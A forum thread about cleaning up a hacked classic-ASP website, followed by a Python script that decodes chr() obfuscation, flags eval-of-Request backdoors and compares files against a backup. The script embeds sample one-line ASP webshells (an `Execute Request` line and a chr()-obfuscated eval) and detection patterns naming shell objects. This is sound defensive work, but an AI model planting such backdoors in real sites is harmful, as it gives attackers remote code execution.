Cleaning up a hacked website
Asked by Terry Woods
I've been assigned to clean up a website that's been hacked somehow.
If I understand it correctly, the website runs ASP code (suspect it's not ASP.NET but not sure how to check) connecting to several Access databases. It also has a section of the site using the PHP CodeIgniter framework. It's suspected that the attacker initially gained access through a weak FTP password.
After an initial clean up and a change of the FTP password, more malicious activity was detected. I suppose it's possible the avenue for this attack may have been different to the initial one.
I've found 9 ASP files that are clearly malicious. However, I'm not particularly familiar with the code on the site and am very aware that I'm unlikely to find them all, so I'm trying to get hold of a backup prior to the initial hack, for comparison purposes. If available, I will try to restore the programming files to what was there prior to the hack.
Are there any tools I can use that might detect malicious files with reasonable accuracy? Are there any neat tricks I can use to at least detect malicious behaviour? Is there anything else that would be useful to know or try?
Most likely that page is a hack as well. Do a search for that string and some shady sites come up talking about viruses and trojans.
ASKER
Thanks all for your help!
ASKER
I thought the contents of this .asp file were interesting:
<%eval (eval(chr(114)+chr(101)+ch
The characters spell out "request". Would this be malicious by any chance? This particular file was date stamped differently to the other malicious ones I found, but I guess one of the easy hacker tricks would be to encourage the victim to think they have found all the malicious files by date stamping most of them with the date of the hack. Anyway, I'm not going to put much more time into trying to find individual files, since it's probably a fruitless exercise.
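The two things asked for in this thread, a way to flag likely-malicious files and a way to compare the live site against a pre-incident backup by content rather than by timestamp, can be combined in one small script. The following is an added example written for this page, not code from the original post or from any of the answers. The sample files and the "backup" are constructed inline (the chr() chain in image.asp spells out "request", the pattern the asker quoted); the rule list is illustrative, not a complete webshell signature set; and load_tree() is an assumed helper for reading a real site tree into the same shape as the constructed samples.

```python
"""Triage classic-ASP sources: decode chr() obfuscation, flag eval/execute fed
from Request, and diff file contents against a known-good backup.

Added example for this thread, not code from the original post.
"""
import hashlib
import re
from pathlib import Path

# Constructed sample files (not from the original site). image.asp builds the
# word "request" out of chr() codes; conn.asp is a plain one-line backdoor.
CURRENT_SITE = {
    "default.asp": '<%\nSet rs = conn.Execute("SELECT * FROM news")\nResponse.Write rs("title")\n%>',
    "image.asp": '<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("cmd"))%>',
    "conn.asp": '<% Execute Request("z") %>',
}
# Constructed pre-incident backup: default.asp unchanged, conn.asp used to be a
# harmless connection file, image.asp did not exist.
BACKUP_SITE = {
    "default.asp": CURRENT_SITE["default.asp"],
    "conn.asp": '<% Set conn = Server.CreateObject("ADODB.Connection") %>',
}

# A run of two or more chr(N) calls joined with + or & (VBScript concatenation).
CHR_CHAIN = re.compile(r"chr\(\s*\d+\s*\)(?:\s*[+&]\s*chr\(\s*\d+\s*\))+", re.IGNORECASE)
# Four or more in a row: there is rarely a benign reason to write a string that way.
CHR_CHAIN_LONG = re.compile(r"(?:chr\(\s*\d+\s*\)\s*[+&]\s*){3,}chr\(\s*\d+\s*\)", re.IGNORECASE)

# Rules applied to the de-obfuscated source. A hit is a reason to open the
# file, not proof on its own.
RULES = {
    # eval/execute with attacker-controlled input on the same line: the
    # classic one-line ASP backdoor.
    "eval_of_request": re.compile(
        r"\b(eval|execute|executeglobal)\b[^\r\n]{0,40}?\brequest\b", re.IGNORECASE),
    # Command execution / raw file I/O objects in a site that should only talk to Access.
    "shell_object": re.compile(r"wscript\.shell|adodb\.stream", re.IGNORECASE),
}


def decode_chr_chains(text):
    """Replace each chr()+chr()+... chain with the quoted string it builds."""
    def repl(match):
        codes = [int(n) for n in re.findall(r"\d+", match.group(0))]
        decoded = "".join(chr(c) for c in codes)
        return '"' + decoded.replace('"', '""') + '"'
    return CHR_CHAIN.sub(repl, text)


def scan_text(text):
    """Return the sorted rule names that fire on one file's source."""
    hits = set()
    if CHR_CHAIN_LONG.search(text):
        hits.add("chr_obfuscation")
    decoded = decode_chr_chains(text)
    for name, rx in RULES.items():
        if rx.search(decoded):
            hits.add(name)
    return sorted(hits)


def sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def compare_to_backup(current, backup):
    """Classify each live file by content hash against the backup. Timestamps
    are ignored on purpose: an attacker can set any mtime they like."""
    report = {}
    for name, text in current.items():
        if name not in backup:
            report[name] = "added_since_backup"
        elif sha256(text) != sha256(backup[name]):
            report[name] = "modified_since_backup"
        else:
            report[name] = "unchanged"
    return report


def triage(current, backup):
    """Per file: (backup status, detection hits). Anything other than
    ('unchanged', []) deserves a look."""
    status = compare_to_backup(current, backup)
    return {name: (status[name], scan_text(text)) for name, text in current.items()}


def load_tree(root, exts=(".asp", ".asa", ".inc", ".php")):
    """Assumed helper: read every script under root into {relative path: text}
    so a real site and its backup can be passed to triage()."""
    root = Path(root)
    return {str(p.relative_to(root)): p.read_text(errors="replace")
            for p in root.rglob("*") if p.suffix.lower() in exts}


if __name__ == "__main__":
    for name, (status, hits) in triage(CURRENT_SITE, BACKUP_SITE).items():
        print(f"{name:12s} {status:22s} {', '.join(hits) or '-'}")
```

On a real site the call is triage(load_tree(live_root), load_tree(backup_root)); the backup comparison is the stronger of the two signals, since it catches files the rules know nothing about, while the rules catch files that were edited in place and files the backup never had. Note that decoding is done before matching, so a file that hides "request" behind chr() is reported by the same rule as one that writes it plainly, and that a clean result from a rule set this small says nothing about files using other tricks.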